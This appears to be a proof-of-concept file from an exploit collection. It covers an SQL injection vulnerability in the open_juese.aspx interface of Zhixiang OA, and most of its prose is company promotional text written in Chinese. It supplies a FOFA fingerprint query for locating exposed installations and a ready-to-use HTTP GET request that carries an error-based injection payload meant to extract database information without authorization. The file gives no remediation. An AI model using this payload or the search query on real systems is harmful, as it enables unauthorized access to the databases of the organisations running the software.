POC/wpoc/致翔OA/致翔OA系统接口open_juese存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.8 KiB
Raw Blame History

致翔OA系统接口open_juese存在SQL注入漏洞

      致翔科技由广州致翔计算机科技有限公司和深圳分公司以及各地还有多家办事处组成是以IT软件技术和管理不断创新为核心的客户需求导向型的高新技术和双软认证软件技术公司。致翔公司产品核心团队主要由具备多年实际企业管理与IT研发经验的专家级技术人才组成研发与经营产品系列包括:集成多个行业应用功能的智慧协同平台以及PC网站手机APP、微信端的研发可以为企事业单位教育机构提供行业版本基础上按需定制的管理系统解决方案目前已经成功应用在华为技术铁通广东分公司深圳海丽达幼儿园集团广州卫监所东莞南开学校福州高级中学长沙明达学校上海中学东校深圳凯卓立液压中国路港集团南方周末广东煌上煌食品集团广州天马摩托车集团公司深圳电信实业广东冠盛集团等超过1000家企事业单位取得了显著的经济和管理效益。致翔OA open_juese存在SQL注入漏洞未经授权的攻击者可通过该漏洞获取数据库敏感信息。

fofa

app="致翔软件-致翔OA"

poc

GET /OpenWindows/open_juese.aspx?key=1&name=1&user=-1)+and+1=user--+&requeststr= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*